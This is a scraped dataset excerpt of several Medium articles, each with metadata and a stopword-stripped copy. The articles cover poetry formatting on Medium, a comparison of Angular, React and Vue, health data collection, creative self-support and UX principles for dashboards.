A Comprehensive Guide To Publishing Poetry On Medium Best Practices, Tips & Tricks, and What Not To Do Photo by NordWood Themes on Unsplash This is for anyone who publishes poetry or plans to, on Medium. Offline poetry is something different. The formatting options and creative iconography are endless. In our journals or on our typewriters, or even in a document, we can use spacing for emphasis. We can freely indent on a piece of paper the exact amount we think is necessary to tell a small part of the story, without using more words. But this is Medium. When it comes to poetry on Medium, there aren’t many formatting options and I know you may think this is an odd thing to say, but I think that’s a good thing. A site like this is visually pleasing because of its consistency. Even though we are all different as writers, the limited formatting options make the screen pretty similar no matter who you are reading. Poets don’t like this. Poets on Medium try to come up with ways to use formatting to enhance their work, but the truth is, there isn’t much you can do. And isn’t it a better thing that the full breadth of power has to come from our words on here? I think it is. Would I like an easier way to indent once in a while? Actually, no, but I bet some would. But we can only work with the options we are given. Part of my goal in writing this is selfish. I edit and publish so much poetry between Assemblage and Loose Words, that I wanted to give an overview of the errors I see the most. And some of these things aren’t errors so much as oversights or just something missed when you are new to the platform. Either way, it will help you as much as it will help me. Hopefully more.
https://medium.com/loose-words/a-comprehensive-guide-to-publishing-poetry-on-medium-ae2535e29b43
['Jonathan Greene']
2020-05-27 12:24:25.524000+00:00
['Guides And Tutorials', 'Poetry', 'Creativity', 'Writing', 'Poetry On Medium']
Title Comprehensive Guide Publishing Poetry MediumContent Comprehensive Guide Publishing Poetry Medium Best Practices Tips Tricks Photo NordWood Themes Unsplash anyone publishes poetry plan Medium Offline poetry something different formatting option creative iconography endless journal typewriter even document use spacing emphasis freely indent piece paper exact amount think necessary tell small part story without using word Medium come poetry Medium aren’t many formatting option know may think odd thing say think that’s good thing site like visually pleasing consistency Even though different writer limited formatting option make screen pretty similar matter reading Poets don’t like Poets Medium try come way use formatting enhance work truth isn’t much isn’t better thing full breadth power come word think Would like easier way indent Actually bet would work option given Part goal writing selfish edit publish much poetry Assemblage Loose Words wanted give overview error see thing aren’t error much oversight something missed new platform Either way help much help Hopefully moreTags Guides Tutorials Poetry Creativity Writing Poetry Medium
3,861
Angular vs. React vs. Vue
Angular vs. React vs. Vue: Spot the Difference The comparison of these three frameworks (Angular versus React versus Vue) will help you to have a clear perspective regarding the perfect framework as per your project requirements. When you have an important project with several bottlenecks, you require a comprehensive understanding of these technologies so you can choose the apt framework. That’s the basis of this article: to detail the essential factors for each framework and to help you to pick the right one among them. 1. Angular vs. React vs. Vue: Popularity According to a 2019 Stack Overflow survey, React is the most desired framework (74.5% of developers preferring it), and Vue is right behind it with 73.6% of developers embracing it. Both React and Vue have a similar number of users. The number of users for Angular isn’t the same as before, but, even so, more than 50% of users still love Angular. Google Trends can dictate the popularity of Angular, React, and Vue among developers. As per Google statistics, React is the most popular framework, followed by Angular and Vue. React easily grabs the attention of developers because of its well-built and secure structure. Although, there’s no denial that Angular and React are used by big names in the software industry: Google uses Angular for their projects, whereas brands like Airbnb, Dropbox, Facebook, WhatsApp, and Netflix are keen on React for development. 2. Angular vs. React vs. Vue: Performance Performance is considered to be the most prominent aspect for a front-end developer during development, whether you choose Angular, React, Vue, or any other framework. And to determine that, you need to understand the performance. Let me help you with that. It is a known fact that DOM is seen as the UI for frameworks. It’s a vital fact that React and Angular take different methods to modernize HTML files, but Vue is the one that brings out the best result. Angular The good: Angular is the most popular framework for JavaScript because it practices real DOM, and it’s the best option for single-page-applications due to the coherent update. Apart from that, Angular goes with a Two-Way Data binding process that recreates the changes from the Model into the views in a safe, efficient, and automatic method. Liability: Due to several features of this framework, during the translation of heavy applications, it slows down the performance. React: Goods: React is a front-end library that applies the Virtual DOM to enhance the performance for all size applications that require frequent content up-gradation, such as Instagram. The base of React is single-direction data flow to have better authority over the project. Liability: The constant changes and development in React demand upgraded and skilled programmers regularly, so sometimes the tech giants are not comfortable working with React. Vue: Goods: Being the youngest member Vue has its perks because Vue doesn’t need to deal with those issues which earlier arose in Angular and React. Vue.js development company provides high performance and memory allocation with all the enhanced features. Liability: Vue has the smallest community support because it’s a novice member of the JavaScript family. 3. Angular vs React vs Vue: Top Use Cases for web development Angular Angular is actively used in its AdWords applications for maximizing the performance because Google is the founder of it. These are the famous web resources that utilize Angular, such as Lego, PayPal, Nike, Weather.com, and The Guardian. 2. React It was specifically designed for Facebook, and it still uses React actively for various product creation. The list of React users goes as, Instagram, Twitter, Whatsapp, and WordPress as well. 3. Vue.js Vue doesn’t have strong allies to implement its products, like Angular and React. Although, in a short span, popular brands such as GitLab, 9Gag, Nintendo, and Grammarly are associated with Vue due to its flexibility. 4. Angular vs React vs Vue: Framework size Angular (around 500 KB): Angular development has a wide range of features that enables developers to create templates to test utilities. For your next project if you want to develop large-scale feature applications, then Angular is the one for you. 2. React (around 100 KB): React is the right framework for modern web development because, with React development, you don’t have to worry about the big spectrum of libraries. 3. Vue (around 65 KB): As per the size of Vue framework and library, it’s suitable for the light-weight application, and for the complex application you need to go with Angular development. 5. Angular vs React vs Vue: Learning curve The learning curve is defined as the capability of users to write codes in a specific programming language. It’s time for us to understand the learning curve of each framework. Vue: Among these three frameworks, Vue.js has the easiest learning curve. And the reason is it’s nearest to the JavaScript basics and HTML. You can consider the start of this task as easy as adding an import to HTML. However, as you create a more complex application, it starts to get complicated. But to tackle the complexity you should use .vue file for the project. 2. React: The learning curve of React.js has a medium to steep learning curve compared to Angular and Vue. React has an “everything is JavaScript” strategy. However, it still has these two essential elements that make the learning curve steeper. ES6 Syntax that syncs perfectly with react, although it’s complex for the beginner. React uses JSX syntax, which is a mixture of JavaScript and HTML, that confuses a lot of users because it forms the image of HTML and works like JavaScript. 3. Angular: The use of TypeScript makes the learning curve of Angular steepest among these three frameworks. Also, the components, syntax, and modules look different than you used to before. Although, the powerful features of it help Angular developers to build applications following certain coding patterns. 6. Angular vs React vs Vue: Scalability Concerning front-end development, scalability often relates to the ability to maintain expanding functionality. That means, applications must increase in size and complexity, and the development platform needs to support such extension. The community developers’ is consistent about both Angular and React, that they both are the best for the task when it’s about building scalable applications. Angular focuses on scalability with its modular development composition, while React obtains to go with a component-based method for the result. However, in terms of scalability, Vue is way too much behind, due to its template-based syntax. As you might know, templates do not go along with large applications as much as JavaScript components. The Choice is Yours There is no doubt that all three frameworks have their perks and downsides. Choosing the best one of these three frameworks entirely depends on the requirements of your project. For instance, in case you want large applications, then Angular development is one for you, of course, if you’re satisfied with TypeScript. Otherwise, React is also suitable for large apps. However, if you like adventure and want to experiment with something newfangled and promising then Vue.js is your framework. I hope the comparison of Angular Vs React Vs Vue assists you to pick the best framework for JavaScript for your future development project.
https://medium.com/swlh/angular-vs-react-vs-vue-802a7c5f7e50
['Nelly Nelson']
2020-11-02 14:33:13.117000+00:00
['Angular', 'Programming', 'React', 'JavaScript', 'Vuejs']
Title Angular v React v VueContent Angular v React v Vue Spot Difference comparison three framework Angular versus React versus Vue help clear perspective regarding perfect framework per project requirement important project several bottleneck require comprehensive understanding technology choose apt framework That’s basis article detail essential factor framework help pick right one among 1 Angular v React v Vue Popularity According 2019 Stack Overflow survey React desired framework 745 developer preferring Vue right behind 736 developer embracing React Vue similar number user number user Angular isn’t even 50 user still love Angular Google Trends dictate popularity Angular React Vue among developer per Google statistic React popular framework followed Angular Vue React easily grab attention developer wellbuilt secure structure Although there’s denial Angular React used big name software industry Google us Angular project whereas brand like Airbnb Dropbox Facebook WhatsApp Netflix keen React development 2 Angular v React v Vue Performance Performance considered prominent aspect frontend developer development whether choose Angular React Vue framework determine need understand performance Let help known fact DOM seen UI framework It’s vital fact React Angular take different method modernize HTML file Vue one brings best result Angular good Angular popular framework JavaScript practice real DOM it’s best option singlepageapplications due coherent update Apart Angular go TwoWay Data binding process recreates change Model view safe efficient automatic method Liability Due several feature framework translation heavy application slows performance React Goods React frontend library applies Virtual DOM enhance performance size application require frequent content upgradation Instagram base React singledirection data flow better authority project Liability constant change development React demand upgraded skilled programmer regularly sometimes tech giant comfortable working React Vue Goods youngest member Vue perk Vue doesn’t need deal issue earlier arose Angular React Vuejs development company provides high performance memory allocation enhanced feature Liability Vue smallest community support it’s novice member JavaScript family 3 Angular v React v Vue Top Use Cases web development Angular Angular actively used AdWords application maximizing performance Google founder famous web resource utilize Angular Lego PayPal Nike Weathercom Guardian 2 React specifically designed Facebook still us React actively various product creation list React user go Instagram Twitter Whatsapp WordPress well 3 Vuejs Vue doesn’t strong ally implement product like Angular React Although short span popular brand GitLab 9Gag Nintendo Grammarly associated Vue due flexibility 4 Angular v React v Vue Framework size Angular around 500 KB Angular development wide range feature enables developer create template test utility next project want develop largescale feature application Angular one 2 React around 100 KB React right framework modern web development React development don’t worry big spectrum library 3 Vue around 65 KB per size Vue framework library it’s suitable lightweight application complex application need go Angular development 5 Angular v React v Vue Learning curve learning curve defined capability user write code specific programming language It’s time u understand learning curve framework Vue Among three framework Vuejs easiest learning curve reason it’s nearest JavaScript basic HTML consider start task easy adding import HTML However create complex application start get complicated tackle complexity use vue file project 2 React learning curve Reactjs medium steep learning curve compared Angular Vue React “everything JavaScript” strategy However still two essential element make learning curve steeper ES6 Syntax syncs perfectly react although it’s complex beginner React us JSX syntax mixture JavaScript HTML confuses lot user form image HTML work like JavaScript 3 Angular use TypeScript make learning curve Angular steepest among three framework Also component syntax module look different used Although powerful feature help Angular developer build application following certain coding pattern 6 Angular v React v Vue Scalability Concerning frontend development scalability often relates ability maintain expanding functionality mean application must increase size complexity development platform need support extension community developers’ consistent Angular React best task it’s building scalable application Angular focus scalability modular development composition React obtains go componentbased method result However term scalability Vue way much behind due templatebased syntax might know template go along large application much JavaScript component Choice doubt three framework perk downside Choosing best one three framework entirely depends requirement project instance case want large application Angular development one course you’re satisfied TypeScript Otherwise React also suitable large apps However like adventure want experiment something newfangled promising Vuejs framework hope comparison Angular Vs React Vs Vue assist pick best framework JavaScript future development projectTags Angular Programming React JavaScript Vuejs
3,862
To Be or Not To Be (2020)
Get this newsletter By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices. Check your inbox Medium sent you an email at to complete your subscription.
https://medium.com/merzazine/to-be-or-not-to-be-2020-3a2f194ae0f
['Vlad Alex', 'Merzmensch']
2020-11-20 11:03:32.338000+00:00
['Videos', 'Artificial Intelligence', 'Music', 'Art', 'Culture']
Title 2020Content Get newsletter signing create Medium account don’t already one Review Privacy Policy information privacy practice Check inbox Medium sent email complete subscriptionTags Videos Artificial Intelligence Music Art Culture
3,863
VJ Loop | RGB Plasmas
This blog takes the broadest conception of sound design possible including visual effects because audio likes video. Over 90,000 views annually. Follow
https://medium.com/sound-and-design/vj-loop-rgbplasmas-424755ae248b
["Michael 'Myk Eff' Filimowicz"]
2020-12-29 02:26:36.212000+00:00
['Design', 'Flair', 'Technology', 'Creativity', 'Art']
Title VJ Loop RGB PlasmasContent blog take broadest conception sound design possible including visual effect audio like video 90000 view annually FollowTags Design Flair Technology Creativity Art
3,864
Here’s Why We Need Health Data Collection
Opinion Here’s Why We Need Health Data Collection Tech can enable valuable experiences with your health data Image by Lukas on Unsplash Our data is constantly collected, from YouTube history to calendar reminders to daily workouts, all possible due to rapid technological growth. According to the National Center for Biotechnology Information, 58% of U.S. cellphone users have downloaded a health-related app onto their devices, but an even greater percentage already had pre-installed software that saved health data (Krebs & Duncan, 2015). Your data, combined with millions and even billions of other people’s, creates big data, or incredibly large datasets. Over time, methods of data collection have evolved, paralleling the developments in science and technology that have allowed companies to harness massive datasets shaping the modern products at our fingertips. As technology becomes an even stronger influence in our daily lives, it is imperative to understand the effects of this kind of data collection from the technological lens and consider multiple perspectives within it. Image by James on Unsplash A prime stakeholder in the debate of health data collection is undoubtedly major technology companies, namely Apple, Amazon, Facebook, Google, and Microsoft. These companies see healthcare as a brilliant but somewhat untapped opportunity to expand innovation and spur economic growth. Jia Low, an author at TechHQ, an independent current technology and business news site, examines why these companies are eager for health data. She discusses that in 2019, Google partnered with Ascension, one of the largest healthcare providers in America, and acquired FitBit. Both of these sources accumulated heaps of patient records from around the world. With this data, Google claims it wants to aid doctors and hospitals in managing their patients more effectively and quickly via electronic health records (EHRs), which make up an astounding 80% of health records today. Amazon is a strong competitor in cloud storage, and its 2018 purchase of the online prescription service PillPack signals its push to target healthcare. The wealthiest tech giant is Apple, which puts privacy at its forefront. Apple is investing in users’ health data to make its Health platform a seamless, more reliable “middleman” in personal health management. Portable devices like the Watch and iPhone (both of which teem with health apps and features) have had positive impacts. Low cites that in 2019, the Watch detected a biker’s severe fall and contacted 911, thus saving his life. Mark Zastrow, a well-regarded writer from the prestigious peer-reviewed Nature scientific journal, covers Apple and Google’s recent collaboration on their joint COVID-19 contact tracing app that will provide more accurate feedback on infected people and notifications for those who came into contact with someone who tested positively. He points out that together, they have solved many of the privacy and efficiency issues of prior methods by implementing encrypted keys and eliminating access to personally-identifying data. Both Low and Zastrow agree that with appropriate privacy measures — encryption, pseudonyms, on-board processing, strong algorithms, and the like — technology companies have just intentions and share a goal of inventing for the betterment of society. It is clear that technology companies provide new innovations targeted to help manage the health of their users, but it is crucial to investigate how users incorporate them into their lives. According to a study by Rock Health from 2015 to 2018 on 4,000 U.S. adult respondents, users have adopted these tools at a record rate: in 2018, 89% of those surveyed used one or more health tools on their devices, an increase from 80% in 2015 and proof that user traction has improved. Authors Sean Day and Megan Zweig from the nationally-recognized technology and health funding company Rock Health construct their argument by discussing the common means through which data is collected: live video telemedicine, wearables, mobile tracking, online reviews, and online health information. In 2018, wearable use began shifting more towards managing health conditions and diagnoses rather than tracking fitness. Additionally, the authors note positive impact of health data collection by reporting that users rated the tools an average of 4.1 out of 5 stars, a high performance. Image by Daria on Unsplash A second way to explore users’ opinions on technology companies handling their health data is trust levels. Lance Lambert, a graduate from Duke University and the University of Cincinnati working at Fortune as a data analyst, reports on a study conducted by Fortune that surveyed 1,267 randomly selected U.S. adults. Lambert first describes that many respondents liked health tracking apps and devices, because it was “illuminating” to “see [their lives] told by the minute.” He clarifies that unfortunately, many users are unaware that their data is stored; even though they technically provide consent before using health data collection apps, they often disregard the “fine print.” It was found that 40% of the respondents are fully willing to have their data utilized by Amazon and Apple, with smaller percentages for Google and Facebook. Interestingly, this demonstrates that many people are in a paradox: they utilize digital health data tools widely and regularly but are also wary of technology companies using that data to their, and potentially the public’s, benefit. Image by Campaign Creators on Unsplash A third role involved heavily is healthcare professionals, specifically doctors. James Gaston, the senior director of data modeling at Healthcare Information and Management Systems Society, says, “[Our cultural definition of healthcare] is moving away from a brick-and-mortar centric event to a broader, patient-centric continuum encompassing lifestyle, geography, social determinants of health and fitness data in addition to traditional healthcare episodic data.” The sheer volume of health data being collected implies that it accurately represents its target audience, significantly improving a more time-consuming, costly, and ineffective policy of direct doctor-patient communication. He asserts that if limited data is collected by only doctors and analyzed at too granular of a level, patterns will be difficult to spot and consequently, innovation will decrease. Medical data from users’ devices combined with doctor-specific sessions incorporates a large array of different types of data — from search queries, app statistics, and wearable outputs to environmental factors and individual lifestyles — and thus provides more informative results. This process of leveraging big data and technology to assist individualized healthcare without a doctor physically present is called telemedicine. Constant collection streaming through patients’ devices, as proved with Apple and Samsung users, can allow doctors, families, and users themselves to consistently track overall health and improve care, says Valarie Romero a telemedicine professor at The University of Arizona. Other scholars oppose her. Gina Neff, a senior research fellow and Associate Professor in the Department of Sociology at the University of Oxford, quotes an anonymous physician in her survey: “I don’t need more data; I need more resources.” She explains that big data is valued in various ways by different people, so some professionals believe data-intensive solutions take excessive time away from providing quality care. Neff claims that creating healthcare solutions built off of vast data collection does not assess multiple viewpoints well. It is evident that technology companies, users, and healthcare professionals have different stances on the topic of digital health data collection through devices. While technology companies have a favorable outlook as they work to develop new products that can be beneficial, citizens have varying levels of trust that their data is used for straightforward purposes. In the healthcare industry, some propose data collection increases efficiency, accuracy, and scalability, and others say it undermines the abilities of the professionals themselves. Cumulatively, these perspectives suggest that health data collection from devices — when active consent, privacy, and personal choice are ensured — is generally positive for both the public and technology companies.
https://towardsdatascience.com/heres-why-we-need-health-data-collection-139cc2aea3ff
['Asmi Kumar']
2020-12-22 14:18:04.439000+00:00
['Data', 'Health', 'Technology', 'People', 'Education']
Title Here’s Need Health Data CollectionContent Opinion Here’s Need Health Data Collection Tech enable valuable experience health data Image Lukas Unsplash data constantly collected YouTube history calendar reminder daily workout possible due rapid technological growth According National Center Biotechnology Information 58 US cellphone user downloaded healthrelated app onto device even greater percentage already preinstalled software saved health data Krebs Duncan 2015 data combined million even billion people’s creates big data incredibly large datasets time method data collection evolved paralleling development science technology allowed company harness massive datasets shaping modern product fingertip technology becomes even stronger influence daily life imperative understand effect kind data collection technological lens consider multiple perspective within Image James Unsplash prime stakeholder debate health data collection undoubtedly major technology company namely Apple Amazon Facebook Google Microsoft company see healthcare brilliant somewhat untapped opportunity expand innovation spur economic growth Jia Low author TechHQ independent current technology business news site examines company eager health data discus 2019 Google partnered Ascension one largest healthcare provider America acquired FitBit source accumulated heap patient record around world data Google claim want aid doctor hospital managing patient effectively quickly via electronic health record EHRs make astounding 80 health record today Amazon strong competitor cloud storage 2018 purchase online prescription service PillPack signal push target healthcare wealthiest tech giant Apple put privacy forefront Apple investing users’ health data make Health platform seamless reliable “middleman” personal health management Portable device like Watch iPhone teem health apps feature positive impact Low cite 2019 Watch detected biker’s severe fall contacted 911 thus saving life Mark Zastrow wellregarded writer prestigious peerreviewed Nature scientific journal cover Apple Google’s recent collaboration joint COVID19 contact tracing app provide accurate feedback infected people notification came contact someone tested positively point together solved many privacy efficiency issue prior method implementing encrypted key eliminating access personallyidentifying data Low Zastrow agree appropriate privacy measure — encryption pseudonym onboard processing strong algorithm like — technology company intention share goal inventing betterment society clear technology company provide new innovation targeted help manage health user crucial investigate user incorporate life According study Rock Health 2015 2018 4000 US adult respondent user adopted tool record rate 2018 89 surveyed used one health tool device increase 80 2015 proof user traction improved Authors Sean Day Megan Zweig nationallyrecognized technology health funding company Rock Health construct argument discussing common mean data collected live video telemedicine wearable mobile tracking online review online health information 2018 wearable use began shifting towards managing health condition diagnosis rather tracking fitness Additionally author note positive impact health data collection reporting user rated tool average 41 5 star high performance Image Daria Unsplash second way explore users’ opinion technology company handling health data trust level Lance Lambert graduate Duke University University Cincinnati working Fortune data analyst report study conducted Fortune surveyed 1267 randomly selected US adult Lambert first describes many respondent liked health tracking apps device “illuminating” “see life told minute” clarifies unfortunately many user unaware data stored even though technically provide consent using health data collection apps often disregard “fine print” found 40 respondent fully willing data utilized Amazon Apple smaller percentage Google Facebook Interestingly demonstrates many people paradox utilize digital health data tool widely regularly also wary technology company using data potentially public’s benefit Image Campaign Creators Unsplash third role involved heavily healthcare professional specifically doctor James Gaston senior director data modeling Healthcare Information Management Systems Society say “Our cultural definition healthcare moving away brickandmortar centric event broader patientcentric continuum encompassing lifestyle geography social determinant health fitness data addition traditional healthcare episodic data” sheer volume health data collected implies accurately represents target audience significantly improving timeconsuming costly ineffective policy direct doctorpatient communication asserts limited data collected doctor analyzed granular level pattern difficult spot consequently innovation decrease Medical data users’ device combined doctorspecific session incorporates large array different type data — search query app statistic wearable output environmental factor individual lifestyle — thus provides informative result process leveraging big data technology assist individualized healthcare without doctor physically present called telemedicine Constant collection streaming patients’ device proved Apple Samsung user allow doctor family user consistently track overall health improve care say Valarie Romero telemedicine professor University Arizona scholar oppose Gina Neff senior research fellow Associate Professor Department Sociology University Oxford quote anonymous physician survey “I don’t need data need resources” explains big data valued various way different people professional believe dataintensive solution take excessive time away providing quality care Neff claim creating healthcare solution built vast data collection ass multiple viewpoint well evident technology company user healthcare professional different stance topic digital health data collection device technology company favorable outlook work develop new product beneficial citizen varying level trust data used straightforward purpose healthcare industry propose data collection increase efficiency accuracy scalability others say undermines ability professional Cumulatively perspective suggest health data collection device — active consent privacy personal choice ensured — generally positive public technology companiesTags Data Health Technology People Education
3,865
What to Do When Your Loved Ones Don’t Support Your Art
What to Do When Your Loved Ones Don’t Support Your Art Don’t try to hire them for a job they don’t want. Photo by Thought Catalog on Unsplash The Pain is Real One of the hardest things about being a writer or any kind of creative is when the people we care about don’t support us. When those who are closest to us snub or poo-poo our creative efforts, it hurts — a lot. I have plenty of people in my life who cheer me on as I pursue my passion for writing. For that, I’m grateful. However, there are some people I expected to be in my corner who aren’t having it. Not even a little bit. This has been a source of hurt for me for three years since I’ve started writing again. I’ve been working through this rejection and making strides in coming to terms with it. Until this week, that is. I got a notification that someone close to me who rarely interacts with my blog’s Facebook page commented. I was so excited. When I opened the notification to read it, it was to point out there was a typo in my post. Wow. Really? You never support anything else I do, but you take the time to point out a typo? Nope. Just nope. At first, I responded with a good-natured reply after fixing my typo. I even used a smiley emoji, though I wasn’t feeling smiley. Upon further reflection, I deleted the comment and my reply. Why? Because I don’t need people embarrassing me on a platform I’ve worked hard to create. It wasn’t about the typo. I make them from time to time. We all do. It was that this person’s only effort to reply to my work was to point out a mistake. The plus side is it spurred me to write this article. So there’s that. How to Respond Maybe you’re in the same boat. Maybe there are people you would love to have support you who just aren’t that into what you’re doing. Maybe you have people who ignore you or point out your typos. Yeah, it stinks. I have some good news and a bit of advice. They aren’t your people when it comes to your creative pursuits. Don’t try to hire them for a job they don’t want. I’ve known this for a while, but today’s public typo comment struck that old nerve. When these things happen, here’s how we can choose to respond. DON’T RESPOND — You aren’t obligated to justify yourself and your art to anyone. Not even those close to you. If others don’t share your enthusiasm, don’t waste time worrying about it like I have in the past (or this week). Keep creating. Know that you are good enough without their support. You can and will succeed without their help. APPROACH THEM — If you feel strongly enough and believe saying something would help (in my case I knew it would not), say something. In a non-defensive way, call or sit the person down and share how important what you are doing is to you. No texting, no emails — voice contact only. Let the person know that his or her lack of support hurts. It could be that those who aren’t supporting you simply don’t realize how you feel. FIND YOUR TRIBE — The best people for supporting creative people are other creative people. Join a local writers’ or artists’ group. Find online groups to connect with other creatives. Even if you have the support of those you care about, other artists will support you in a special way that your loved ones cannot. We are a quirky, caring, supportive bunch. THANK YOUR SUPPORTERS — Remember to thank those who care about what you are doing. My husband is the absolute best. He is endlessly encouraging and loving. I know I am fortunate that the person closest to me in all the world supports me. Not everyone has this kind of support. I thank him and others for believing in me because it’s only right to acknowledge their kindness. Be a Cheerleader The best response to negativity is positivity. Please don’t get me wrong. This is grueling work. Avoiding a claws-out confrontation is not easy when you feel hurt. This is especially true when you are passionate about your work. Let the naysayers do their thing and find someone to encourage instead. If you know how it feels to be overlooked or snubbed by those you care about, make sure you don’t do the same. Acknowledge those who are working hard to create something. Read their writing. Buy their art. Go to their concerts. Share their work with others by social media or word of mouth. I’ve gotten into an online critique group with two other women and it has been wonderful. I met them through an online writers’ group. We have never met but have been critiquing each other’s work and cheering each other on. A couple of years ago, I started a small local writers’ group and meet with them monthly. We are strengthened and encouraged by our time together. As the proverb says, iron sharpens iron. Becoming a member of Medium and giving support through claps, comments, and highlights is a great way to be a cheerleader. In doing so, you are helping other writers make money as well. What could be better? Take heart. Not everyone is going to love what you are doing. Not everyone will understand and acknowledge your passion. Choose wisely in how you respond and above all, don’t stop creating. The world needs your art.
https://medium.com/swlh/what-to-do-when-your-loved-ones-dont-support-your-art-856cdc842f5
['Tracy Gerhardt-Cooper']
2019-06-16 23:11:06.279000+00:00
['Relationships', 'Creativity', 'Life Lessons', 'Writing', 'Self Improvement']
Title Loved Ones Don’t Support ArtContent Loved Ones Don’t Support Art Don’t try hire job don’t want Photo Thought Catalog Unsplash Pain Real One hardest thing writer kind creative people care don’t support u closest u snub poopoo creative effort hurt — lot plenty people life cheer pursue passion writing I’m grateful However people expected corner aren’t even little bit source hurt three year since I’ve started writing I’ve working rejection making stride coming term week got notification someone close rarely interacts blog’s Facebook page commented excited opened notification read point typo post Wow Really never support anything else take time point typo Nope nope first responded goodnatured reply fixing typo even used smiley emoji though wasn’t feeling smiley Upon reflection deleted comment reply don’t need people embarrassing platform I’ve worked hard create wasn’t typo make time time person’s effort reply work point mistake plus side spurred write article there’s Respond Maybe you’re boat Maybe people would love support aren’t you’re Maybe people ignore point typo Yeah stink good news bit advice aren’t people come creative pursuit Don’t try hire job don’t want I’ve known today’s public typo comment struck old nerve thing happen here’s choose respond DON’T RESPOND — aren’t obligated justify art anyone even close others don’t share enthusiasm don’t waste time worrying like past week Keep creating Know good enough without support succeed without help APPROACH — feel strongly enough believe saying something would help case knew would say something nondefensive way call sit person share important texting email — voice contact Let person know lack support hurt could aren’t supporting simply don’t realize feel FIND TRIBE — best people supporting creative people creative people Join local writers’ artists’ group Find online group connect creatives Even support care artist support special way loved one cannot quirky caring supportive bunch THANK SUPPORTERS — Remember thank care husband absolute best endlessly encouraging loving know fortunate person closest world support everyone kind support thank others believing it’s right acknowledge kindness Cheerleader best response negativity positivity Please don’t get wrong grueling work Avoiding clawsout confrontation easy feel hurt especially true passionate work Let naysayer thing find someone encourage instead know feel overlooked snubbed care make sure don’t Acknowledge working hard create something Read writing Buy art Go concert Share work others social medium word mouth I’ve gotten online critique group two woman wonderful met online writers’ group never met critiquing other’s work cheering couple year ago started small local writers’ group meet monthly strengthened encouraged time together proverb say iron sharpens iron Becoming member Medium giving support clap comment highlight great way cheerleader helping writer make money well could better Take heart everyone going love everyone understand acknowledge passion Choose wisely respond don’t stop creating world need artTags Relationships Creativity Life Lessons Writing Self Improvement
3,866
3 UX Design Principles for Better Data Visualization
Three UX Design Principles 1. Just KISS I am sorry it is not what you are thinking ;) KISS means “keep it simple, stupid”. Good user experience doesn’t mean stacking all the beautiful graphics together. It looks amazing, but your attention is dispersed everywhere on the screen, and to be honest, it is tiring. It is also not about creating complicated graphs that show off how scientific and professional they look, that only scare people off. There are some graphs we’d better avoid using based on this principle. For example, only use 3D chart if it is really necessary. Most of the time, the third dimension just doesn’t serve any purpose. Instead, it makes the visuals so heavy and thick to digest. Another example is secondary y-axis, it takes more frictions and efforts to understand which axis the chart is mapped against. Like this chart below, can you easily tell which axis is for the bar chart and which one is for the line chart within 3 seconds? Therefore, keep it minimal and eliminate clutter, these simple tricks can additionally make your dashboard looks cleaner instantly: 1. Use no more than five colours (or 3 main colours) in one dashboard. 2. Un-bold chart captions and titles. Make them concise. 3. Remove chart gridlines and borders. Delivering knowledge is not about showing off how skilled you are, rather it is to highlight common understanding between deliverers and receivers. Just KISS! 2. Form Follows Function Built upon the previous point, it is essential to design the dashboard that actually delivers the message to the receivers, hence it is required to meet the key objectives. That is, to prioritize what are the core functions and insights the dashboard needs to demonstrate. Then choose the forms correspondingly. Emphasize on selecting the most appropriate chart that is aligned with the data type. Bar chart compares the measures of categorical data. Histogram looks very similar to the bar chart because it also consists of bars. However, instead of comparing the categorical data, it breaks down a numeric data into interval groups and shows the frequency of data fall into each group. Line chart indicates trend and development of variables over time, usually represented by one numeric data against a date-type variable. It is commonly used in time series analysis. Pie chart is used to represent the percentage and weight of categorical data. Intuitively depict proportions of a whole. Map shows numeric data that can be grouped by regions. Using gradient colors is a great way to visualize the density difference in various geographical locations. Scatter plot visualizes the correlation between two numeric variables. Common to identify relationships such as linear regression, logistic regression etc. These are the most basic charts. There are more complicated graphs that perform advanced analytics such as heatmap, treemap, box plot etc … That’s another story that is definitely worth diving deeper. However, it is not the main focus of this article. Most importanly, it is to always keep the users in mind and be clear about the objectives. It doesn’t matter how fancy the form is if it doesn’t bring any functions. 3. Take the Advantage of Hierarchy Hierarchy is essential in terms of indicating viewers where to look first. It can be constructed implicitly using size, color, position etc. Size: Large and bold fonts are more likely to stand out whereas small and thin texts are less prioritised. If we are using texts to display statistics, make sure they do pop up from other text forms such as title and caption. This principle goes beyond just text, using different sizes of shape also creates a hierarchical layout. Position: Human visual perception determines that we are more likely to look at the top left corner or the center of the screen. Therefore, the most important information should be located at these areas where viewers distribute most of their attention. Color: Bright colors are more likely to stand out whereas pale colors will be brought to the background. Another general rule is that color that breaks the consistency will be perceived as the important message. Therefore, make use of contrast to make the key information grab your audience’s attention.
https://medium.com/analytics-vidhya/3-ux-design-principles-for-better-data-visualization-70548630ff28
['Destin Gong']
2020-09-16 04:04:43.714000+00:00
['Data', 'Data Analysis', 'UX', 'Design', 'Dashboard']
Title 3 UX Design Principles Better Data VisualizationContent Three UX Design Principles 1 KISS sorry thinking KISS mean “keep simple stupid” Good user experience doesn’t mean stacking beautiful graphic together look amazing attention dispersed everywhere screen honest tiring also creating complicated graph show scientific professional look scare people graph we’d better avoid using based principle example use 3D chart really necessary time third dimension doesn’t serve purpose Instead make visuals heavy thick digest Another example secondary yaxis take friction effort understand axis chart mapped Like chart easily tell axis bar chart one line chart within 3 second Therefore keep minimal eliminate clutter simple trick additionally make dashboard look cleaner instantly 1 Use five colour 3 main colour one dashboard 2 Unbold chart caption title Make concise 3 Remove chart gridlines border Delivering knowledge showing skilled rather highlight common understanding deliverer receiver KISS 2 Form Follows Function Built upon previous point essential design dashboard actually delivers message receiver hence required meet key objective prioritize core function insight dashboard need demonstrate choose form correspondingly Emphasize selecting appropriate chart aligned data type Bar chart compare measure categorical data Histogram look similar bar chart also consists bar However instead comparing categorical data break numeric data interval group show frequency data fall group Line chart indicates trend development variable time usually represented one numeric data datetype variable commonly used time series analysis Pie chart used represent percentage weight categorical data Intuitively depict proportion whole Map show numeric data grouped region Using gradient color great way visualize density difference various geographical location Scatter plot visualizes correlation two numeric variable Common identify relationship linear regression logistic regression etc basic chart complicated graph perform advanced analytics heatmap treemap box plot etc … That’s another story definitely worth diving deeper However main focus article importanly always keep user mind clear objective doesn’t matter fancy form doesn’t bring function 3 Take Advantage Hierarchy Hierarchy essential term indicating viewer look first constructed implicitly using size color position etc Size Large bold font likely stand whereas small thin text le prioritised using text display statistic make sure pop text form title caption principle go beyond text using different size shape also creates hierarchical layout Position Human visual perception determines likely look top left corner center screen Therefore important information located area viewer distribute attention Color Bright color likely stand whereas pale color brought background Another general rule color break consistency perceived important message Therefore make use contrast make key information grab audience’s attentionTags Data Data Analysis 